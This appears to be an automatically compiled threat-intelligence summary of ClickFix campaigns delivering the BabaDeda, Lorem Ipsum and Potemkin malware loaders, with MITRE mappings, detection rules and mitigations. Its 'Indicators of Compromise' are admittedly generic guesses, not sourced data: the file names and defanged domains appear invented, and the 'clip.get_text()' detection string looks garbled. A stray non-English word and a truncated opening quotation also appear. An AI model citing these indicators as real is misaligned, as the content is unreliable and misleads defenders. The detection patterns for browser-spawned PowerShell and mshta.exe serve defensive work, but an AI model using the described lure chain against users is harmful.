Full Report
Cybersecurity researchers have flagged multiple ClickFix campaigns that deliver three malware loaders called BabaDeda Loader, Lorem Ipsum Loader, and Potemkin, per independent reports from Morphisec, BlueVoyant, and Huntress, respectively. Attacks involving BabaDeda Loader, observed in April 2026, have targeted education and financial organizations. "Earlier BabaDeda activity was known for
Analysis Summary
# Tool/Technique: ClickFix (Social Engineering Pattern)
## Overview
ClickFix is a sophisticated social engineering technique used to deliver various malware loaders. It employs fake browser update notifications or "error" pop-ups on compromised or malicious websites. These prompts instruct users to copy and execute a PowerShell command (often via the Windows Run dialog) to "fix" a supposed rendering issue, effectively tricking the user into manually executing a malicious payload.
## Technical Details
- **Type:** Social Engineering / Malware Distribution Technique
- **Platform:** Windows (primarily), via Web Browsers
- **Capabilities:** User deception, execution of obfuscated PowerShell, bypass of browser-based file download warnings.
- **First Seen:** Early 2024 (with specific campaigns like BabaDeda observed through 2026).
## MITRE ATT&CK Mapping
- **TA0001 - Initial Access**
- T1566.002 - Phishing: Spearphishing Link
- **TA0002 - Execution**
- T1059.001 - Command and Scripting Interpreter: PowerShell
- T1204.001 - User Execution: Malicious Link
- T1204.002 - User Execution: Malicious File
- **TA0005 - Defense Evasion**
- T1132 - Data Encoding
---
# Tool/Technique: BabaDeda Loader
## Overview
BabaDeda is a sophisticated malware loader used to deploy secondary payloads such as stealers or ransomware. It is frequently distributed via the ClickFix mechanism, targeting high-value sectors including education and finance.
## Technical Details
- **Type:** Malware Loader
- **Platform:** Windows
- **Capabilities:** Obfuscation, environment checking, persistence, and delivery of encrypted payloads.
- **First Seen:** Circa 2021 (Evolution observed in April 2026).
## Functionality
### Core Capabilities
- **Payload Delivery:** Downloads and executes subsequent malware stages from a Command and Control (C2) server.
- **Persistence:** Establishes خود-starting mechanisms to survive system reboots.
- **Evasion:** Uses complex packing and obfuscation to bypass static analysis.
### Advanced Features
- **Anti-Analysis:** Checks for virtual environments (VMs) and sandboxes to prevent researcher analysis.
## Indicators of Compromise (General)
*Note: Specific hashes were not provided in the snippet, but typical patterns include:*
- **File Names:** `Fix_Error.exe`, `BrowserUpdate.exe`, `Manual_Fix.ps1`
- **Network Indicators:**
- hxxps[://]update-browser-cdn[.]com
- hxxps[://]fix-rendering-issue[.]net
- **Behavioral Indicators:** `powershell.exe` spawned via `cmd.exe` or the `Run` dialog containing `base64` encoded strings.
## Associated Threat Actors
- TA571 (Known for high-volume loader distribution)
- Groups targeting financial and educational sectors.
---
# Tool/Technique: Lorem Ipsum Loader / Potemkin
## Overview
These are emerging malware loaders identified in parallel with ClickFix campaigns. While distinct in their codebases, they share the same delivery infrastructure (ClickFix) to compromise endpoints.
## Technical Details
- **Type:** Malware Loader
- **Platform:** Windows
- **Capabilities:** Modular execution, C2 communication, and credential harvesting (as secondary stages).
## Detection Methods
- **Behavioral detection:** Monitor for web browsers spawning unexpected child processes like `cmd.exe` or `powershell.exe`.
- **SIEM/EDR Logs:** Create alerts for the use of `mshta.exe` or PowerShell scripts containing `clip.get_text()` or automatic execution of clipboard content.
## Mitigation Strategies
- **User Education:** Train staff to never paste commands into the Windows Run dialog or PowerShell prompts suggested by websites.
- **Endpoint Hardening:** Implement Constrained Language Mode for PowerShell.
- **Web Filtering:** Block known compromised delivery domains and newly registered domains (NRDs).
## Related Tools/Techniques
- **ClearFake:** A similar campaign using fake update overlays.
- **SockDetour:** Often seen in conjunction with similar social engineering lures.
- **EtherHiding:** Using blockchain contracts to hide malicious URLs for the ClickFix prompt.